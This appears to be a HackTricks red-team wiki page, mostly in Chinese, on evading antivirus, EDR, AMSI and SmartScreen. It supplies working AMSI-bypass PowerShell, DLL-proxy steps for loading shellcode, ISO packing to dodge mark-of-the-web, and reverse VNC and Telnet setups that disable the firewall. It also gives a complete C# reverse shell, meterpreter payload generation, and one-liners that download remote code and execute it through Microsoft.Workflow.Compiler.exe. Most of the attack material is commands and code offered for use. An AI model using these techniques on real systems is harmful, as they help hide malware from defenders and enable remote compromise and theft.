Antivirus (AV) Bypass
Reading time: 31 minutes
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
此页面由 @m2rc_p撰写!
AV规避方法论
目前,AV使用不同的方法来检查文件是否恶意,包括静态检测、动态分析,以及对于更高级的EDR,行为分析。
静态检测
静态检测是通过标记已知的恶意字符串或字节数组在二进制文件或脚本中实现的,同时还提取文件本身的信息(例如,文件描述、公司名称、数字签名、图标、校验和等)。这意味着使用已知的公共工具可能更容易被捕获,因为它们可能已经被分析并标记为恶意。有几种方法可以绕过这种检测:
- 加密
如果你加密了二进制文件,AV将无法检测到你的程序,但你需要某种加载程序来解密并在内存中运行该程序。
- 混淆
有时你只需要更改二进制文件或脚本中的一些字符串就能通过AV,但这可能是一个耗时的任务,具体取决于你想混淆的内容。
- 自定义工具
如果你开发自己的工具,将不会有已知的恶意签名,但这需要大量的时间和精力。
note
检查Windows Defender静态检测的一个好方法是 ThreatCheck。它基本上将文件分成多个部分,然后让Defender逐个扫描,这样可以准确告诉你在二进制文件中被标记的字符串或字节。
我强烈建议你查看这个 YouTube播放列表,关于实用的AV规避。
动态分析
动态分析是指AV在沙箱中运行你的二进制文件并监视恶意活动(例如,尝试解密并读取浏览器的密码,执行LSASS的minidump等)。这部分可能更难处理,但这里有一些你可以做的事情来规避沙箱。
- 执行前休眠 根据实现方式,这可能是绕过AV动态分析的好方法。AV扫描文件的时间非常短,以免打断用户的工作流程,因此使用长时间的休眠可以干扰二进制文件的分析。问题是许多AV的沙箱可以根据实现方式跳过休眠。
- 检查机器资源 通常沙箱可用的资源非常少(例如,< 2GB RAM),否则可能会减慢用户的机器。你也可以在这里发挥创造力,例如检查CPU的温度或风扇速度,并不是所有内容都会在沙箱中实现。
- 特定机器检查 如果你想针对加入“contoso.local”域的用户的工作站,你可以检查计算机的域是否与指定的匹配,如果不匹配,你可以让程序退出。
事实证明,Microsoft Defender的沙箱计算机名是HAL9TH,因此,你可以在恶意软件引爆前检查计算机名,如果名称匹配HAL9TH,则意味着你在Defender的沙箱中,因此可以让程序退出。
一些来自 @mgeeky 的非常好的针对沙箱的建议
正如我们在这篇文章中之前所说,公共工具最终会被检测到,所以你应该问自己一个问题:
例如,如果你想转储LSASS,你真的需要使用mimikatz吗?或者你可以使用一个不太知名的项目来转储LSASS。
正确的答案可能是后者。以mimikatz为例,它可能是被AV和EDR标记的最多的恶意软件之一,尽管该项目本身非常酷,但在绕过AV时使用它也是一场噩梦,因此只需寻找替代方案来实现你的目标。
note
在修改你的有效载荷以进行规避时,请确保关闭Defender中的自动样本提交,并且请认真考虑,如果你的目标是长期规避,请不要上传到VIRUSTOTAL。如果你想检查你的有效载荷是否被特定AV检测到,请在虚拟机上安装它,尝试关闭自动样本提交,并在那里进行测试,直到你对结果满意为止。
EXEs与DLLs
只要可能,始终优先使用DLL进行规避,根据我的经验,DLL文件通常被检测和分析的概率要低得多,因此在某些情况下使用它们是一个非常简单的技巧(当然,如果你的有效载荷有某种方式以DLL的形式运行)。
正如我们在这张图片中看到的,Havoc的DLL有效载荷在antiscan.me上的检测率为4/26,而EXE有效载荷的检测率为7/26。
现在我们将展示一些你可以使用DLL文件的技巧,以便更加隐蔽。
DLL侧载与代理
DLL侧载利用加载程序使用的DLL搜索顺序,通过将受害者应用程序和恶意有效载荷并排放置来实现。
你可以使用 Siofra 和以下PowerShell脚本检查易受DLL侧载影响的程序:
Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
}
此命令将输出“C:\Program Files\”中易受DLL劫持影响的程序列表及其尝试加载的DLL文件。
我强烈建议您自己探索可被DLL劫持/侧载的程序,如果正确执行,这种技术相当隐蔽,但如果您使用公开已知的DLL侧载程序,可能会很容易被抓住。
仅仅放置一个恶意DLL,其名称是程序期望加载的名称,并不会加载您的有效载荷,因为程序期望该DLL中有一些特定的函数。为了解决这个问题,我们将使用另一种技术,称为DLL代理/转发。
DLL代理将程序从代理(和恶意)DLL发出的调用转发到原始DLL,从而保留程序的功能,并能够处理您的有效载荷的执行。
我将使用@flangvik的SharpDLLProxy项目。
以下是我遵循的步骤:
1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
4. Use SharpDLLProxy to create the proxy dll (.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin)
最后的命令将给我们两个文件:一个 DLL 源代码模板和重命名后的原始 DLL。
``` 5. Create a new visual studio project (C++ DLL), paste the code generated by SharpDLLProxy (Under output_dllname/dllname_pragma.c) and compile. Now you should have a proxy dll which will load the shellcode you've specified and also forward any calls to the original DLL. ```我们的 shellcode(使用 SGN 编码)和代理 DLL 在 antiscan.me 上的检测率为 0/26!我认为这是一个成功。
note
我 强烈推荐 你观看 S3cur3Th1sSh1t 的 twitch VOD 关于 DLL Sideloading,以及 ippsec 的视频 以更深入地了解我们讨论的内容。
Freeze
Freeze 是一个用于通过挂起进程、直接系统调用和替代执行方法绕过 EDR 的有效载荷工具包
你可以使用 Freeze 以隐秘的方式加载和执行你的 shellcode。
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Profit, no alerts from defender
note
规避只是猫鼠游戏,今天有效的方法明天可能会被检测到,因此永远不要仅依赖一个工具,如果可能,尝试将多个规避技术结合使用。
AMSI(反恶意软件扫描接口)
AMSI的创建是为了防止“无文件恶意软件”。最初,AV只能扫描磁盘上的文件,因此如果你能够以某种方式直接在内存中执行有效载荷,AV就无法采取任何措施来阻止,因为它没有足够的可见性。
AMSI功能集成在Windows的以下组件中。
- 用户帐户控制,或UAC(提升EXE、COM、MSI或ActiveX安装)
- PowerShell(脚本、交互使用和动态代码评估)
- Windows脚本宿主(wscript.exe和cscript.exe)
- JavaScript和VBScript
- Office VBA宏
它允许杀毒软件通过以未加密和未混淆的形式暴露脚本内容来检查脚本行为。
运行IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
将在Windows Defender上产生以下警报。
注意它如何在前面加上amsi:
,然后是脚本运行的可执行文件的路径,在这种情况下是powershell.exe。
我们没有将任何文件写入磁盘,但仍然因为AMSI在内存中被捕获。
有几种方法可以绕过AMSI:
- 混淆
由于AMSI主要依赖静态检测,因此修改你尝试加载的脚本可能是规避检测的好方法。
然而,AMSI有能力解混淆脚本,即使它有多层,因此混淆可能是一个糟糕的选择,具体取决于其实现方式。这使得规避变得不那么简单。尽管有时,你只需要更改几个变量名称就可以了,所以这取决于某个内容被标记的程度。
- AMSI绕过
由于AMSI是通过将DLL加载到powershell(也包括cscript.exe、wscript.exe等)进程中来实现的,因此即使以非特权用户身份运行,也可以轻松篡改它。由于AMSI实现中的这个缺陷,研究人员发现了多种规避AMSI扫描的方法。
强制错误
强制AMSI初始化失败(amsiInitFailed)将导致当前进程不会启动扫描。最初这是由Matt Graeber披露的,微软已经开发了一个签名以防止更广泛的使用。
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
只需一行 PowerShell 代码即可使当前 PowerShell 进程无法使用 AMSI。 当然,这一行已被 AMSI 本身标记,因此需要进行一些修改才能使用此技术。
这是我从这个 Github Gist 中获取的修改过的 AMSI 绕过方法。
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
$DiskMgr = 'Syst+@.M£n£g' + 'e@+nt.Auto@' + '£tion.A' -join ''
$fdx = '@ms' + '£In£' + 'tF@£' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
$CleanUp = $DiskMgr.Replace('@','m').Replace('£','a').Replace('+','e')
$Rawdata = $fdx.Replace('@','a').Replace('£','i').Replace('+','e')
$SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
$Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
请记住,一旦这篇文章发布,它可能会被标记,因此如果你的计划是保持不被检测,就不应该发布任何代码。
内存补丁
该技术最初是由 @RastaMouse 发现的,它涉及在 amsi.dll 中找到 "AmsiScanBuffer" 函数的地址(负责扫描用户提供的输入),并用返回 E_INVALIDARG 代码的指令覆盖它,这样,实际扫描的结果将返回 0,这被解释为干净的结果。
note
请阅读 https://rastamouse.me/memory-patching-amsi-bypass/ 以获取更详细的解释。
还有许多其他技术可以通过 PowerShell 绕过 AMSI,查看 此页面 和 这个仓库 以了解更多信息。
或者这个脚本通过内存补丁将补丁应用于每个新的 PowerShell。
混淆
有几种工具可以用来 混淆 C# 明文代码,生成 元编程模板 以编译二进制文件或 混淆编译后的二进制文件,例如:
- InvisibilityCloak: C# 混淆器
- Obfuscator-LLVM: 该项目的目的是提供一个开源的 LLVM 编译套件分支,能够通过 代码混淆 和防篡改提供增强的软件安全性。
- ADVobfuscator: ADVobfuscator 演示如何使用
C++11/14
语言在编译时生成混淆代码,而无需使用任何外部工具且不修改编译器。 - obfy: 添加一层由 C++ 模板元编程框架生成的混淆操作,这将使想要破解应用程序的人稍微困难一些。
- Alcatraz: Alcatraz 是一个 x64 二进制混淆器,能够混淆各种不同的 pe 文件,包括:.exe, .dll, .sys
- metame: Metame 是一个简单的变形代码引擎,用于任意可执行文件。
- ropfuscator: ROPfuscator 是一个细粒度的代码混淆框架,适用于使用 ROP(面向返回的编程)的 LLVM 支持语言。ROPfuscator 通过将常规指令转换为 ROP 链,在汇编代码级别混淆程序,阻碍我们对正常控制流的自然概念。
- Nimcrypt: Nimcrypt 是一个用 Nim 编写的 .NET PE 加密器。
- inceptor: Inceptor 能够将现有的 EXE/DLL 转换为 shellcode,然后加载它们。
SmartScreen & MoTW
你可能在从互联网下载某些可执行文件并执行它们时见过这个屏幕。
Microsoft Defender SmartScreen 是一种安全机制,旨在保护最终用户免受运行潜在恶意应用程序的影响。
SmartScreen 主要采用基于声誉的方法,这意味着不常下载的应用程序将触发 SmartScreen,从而警告并阻止最终用户执行该文件(尽管可以通过点击更多信息 -> 无论如何运行来执行该文件)。
MoTW(网络标记)是一个 NTFS 备用数据流,其名称为 Zone.Identifier,下载来自互联网的文件时会自动创建,并附带下载的 URL。
note
重要的是要注意,使用 受信任 签名证书签名的可执行文件 不会触发 SmartScreen。
防止你的有效载荷获得网络标记的一个非常有效的方法是将它们打包在某种容器中,例如 ISO。这是因为网络标记(MOTW) 不能 应用于 非 NTFS 卷。
PackMyPayload 是一个将有效载荷打包到输出容器中的工具,以规避网络标记。
示例用法:
PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso
+ o + o + o + o
+ o + + o + +
o + + + o + + o
-_-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-_-_-_-_-_-_-_,------, o
:: PACK MY PAYLOAD (1.1.0) -_-_-_-_-_-_-| /\_/\
for all your container cravings -_-_-_-_-_-~|__( ^ .^) + +
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-__-_-_-_-_-_-_-'' ''
+ o o + o + o o + o
+ o + o ~ Mariusz Banach / mgeeky o
o ~ + ~ <mb [at] binary-offensive.com>
o + o + +
[.] Packaging input file to output .iso (iso)...
Burning file onto ISO:
Adding file: /TotallyLegitApp.exe
[+] Generated file written to (size: 3420160): container.iso
这里是一个通过将有效负载打包在 ISO 文件中来绕过 SmartScreen 的演示,使用 PackMyPayload
C# 程序集反射
在内存中加载 C# 二进制文件已经被知道了一段时间,这仍然是运行后渗透工具而不被 AV 捕获的非常好方法。
由于有效负载将直接加载到内存中而不接触磁盘,我们只需担心在整个过程中修补 AMSI。
大多数 C2 框架(sliver、Covenant、metasploit、CobaltStrike、Havoc 等)已经提供了直接在内存中执行 C# 程序集的能力,但有不同的方法可以做到这一点:
- Fork&Run
这涉及到 生成一个新的牺牲进程,将你的后渗透恶意代码注入到该新进程中,执行你的恶意代码,完成后杀死新进程。这有其优点和缺点。Fork 和运行方法的好处在于执行发生在我们的 Beacon 植入进程 之外。这意味着如果我们的后渗透操作出现问题或被捕获,我们的 植入物存活的机会会更大。缺点是你有 更大的机会 被 行为检测 捕获。
- Inline
这涉及将后渗透恶意代码 注入到其自身进程中。这样,你可以避免创建新进程并让其被 AV 扫描,但缺点是如果你的有效负载执行出现问题,失去你的 beacon 的机会会更大,因为它可能会崩溃。
note
如果你想了解更多关于 C# 程序集加载的信息,请查看这篇文章 https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/ 和他们的 InlineExecute-Assembly BOF (https://github.com/xforcered/InlineExecute-Assembly)
你还可以 从 PowerShell 加载 C# 程序集,查看 Invoke-SharpLoader 和 S3cur3th1sSh1t 的视频。
使用其他编程语言
正如在 https://github.com/deeexcee-io/LOI-Bins 中提出的,可以通过让被攻陷的机器访问 安装在攻击者控制的 SMB 共享上的解释器环境 来使用其他语言执行恶意代码。
通过允许访问 SMB 共享上的解释器二进制文件和环境,你可以 在被攻陷机器的内存中执行这些语言的任意代码。
该仓库指出:Defender 仍然会扫描脚本,但通过利用 Go、Java、PHP 等,我们有 更多灵活性来绕过静态签名。使用这些语言中的随机未混淆反向 shell 脚本进行测试已证明成功。
高级规避
规避是一个非常复杂的话题,有时你必须考虑一个系统中许多不同的遥测来源,因此在成熟环境中完全不被检测几乎是不可能的。
你所面对的每个环境都有其自身的优缺点。
我强烈建议你观看 @ATTL4S 的这场演讲,以了解更多高级规避技术。
[NcN2k20] Understanding and Hiding your Operations - Daniel López Jiménez
这也是 @mariuszbit 关于深入规避的另一场精彩演讲。
旧技术
检查 Defender 发现的恶意部分
你可以使用 ThreatCheck,它会 删除二进制文件的部分,直到 找出 Defender 发现的恶意部分并将其分离给你。
另一个做 同样事情的工具是 avred,它在 https://avred.r00ted.ch/ 提供开放的网络服务。
Telnet 服务器
直到 Windows 10,所有 Windows 都附带一个 Telnet 服务器,你可以通过以下方式安装(作为管理员):
pkgmgr /iu:"TelnetServer" /quiet
使其在系统启动时启动并立即运行:
sc config TlntSVR start= auto obj= localsystem
更改 telnet 端口 (隐蔽) 并禁用防火墙:
tlntadmn config port=80
netsh advfirewall set allprofiles state off
UltraVNC
从以下地址下载: http://www.uvnc.com/downloads/ultravnc.html (你需要的是二进制下载,而不是安装程序)
在主机上: 执行 winvnc.exe 并配置服务器:
- 启用选项 Disable TrayIcon
- 在 VNC Password 中设置密码
- 在 View-Only Password 中设置密码
然后,将二进制文件 winvnc.exe 和 新创建的 文件 UltraVNC.ini 移动到 受害者 机器中
反向连接
攻击者应在其 主机 中执行二进制文件 vncviewer.exe -listen 5900
,以便 准备 捕获反向 VNC 连接。然后,在 受害者 机器中: 启动 winvnc 守护进程 winvnc.exe -run
并运行 winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900
警告: 为了保持隐蔽性,你必须避免以下几件事
- 如果
winvnc
已经在运行,不要启动它,否则会触发一个 弹出窗口。使用tasklist | findstr winvnc
检查它是否在运行 - 如果同一目录中没有
UltraVNC.ini
,不要启动winvnc
,否则会导致 配置窗口 打开 - 不要运行
winvnc -h
获取帮助,否则会触发一个 弹出窗口
GreatSCT
从以下地址下载: https://github.com/GreatSCT/GreatSCT
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
./setup.sh
cd ..
./GreatSCT.py
在 GreatSCT 内部:
use 1
list #Listing available payloads
use 9 #rev_tcp.py
set lhost 10.10.14.0
sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
现在 启动 lister 使用 msfconsole -r file.rc
并 执行 xml payload 使用:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
当前的防御者会非常快速地终止进程。
编译我们自己的反向 shell
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
第一个 C# 反向 shell
使用以下命令编译:
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
与之一起使用:
back.exe <ATTACKER_IP> <PORT>
// From https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}
C# 使用编译器
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
自动下载和执行:
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe \xc2\xb7 GitHub
C# 混淆器列表: https://github.com/NotPrab/.NET-Obfuscator
C++
sudo apt-get install mingw-w64
i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
- https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp
- https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
- https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf
- https://github.com/l0ss/Grouper2
- http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
- http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/
使用 Python 构建注入器示例:
其他工具
# Veil Framework:
https://github.com/Veil-Framework/Veil
# Shellter
https://www.shellterproject.com/download/
# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless:
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
# Stageless HTA Payload:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
# Donut:
https://github.com/TheWover/donut
# Vulcan
https://github.com/praetorian-code/vulcan
更多
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。